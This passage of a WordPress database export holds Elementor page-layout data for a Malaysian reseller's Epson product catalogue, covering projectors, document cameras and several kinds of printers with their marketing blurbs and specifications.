]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7762,3452,'_elementor_version','2.5.14'),(7765,3453,'_wp_page_template','template-fullwidth.php'),(7766,3453,'_elementor_edit_mode','builder'),(7767,3453,'_elementor_template_type','post'),(7768,3453,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":183,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":78,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO 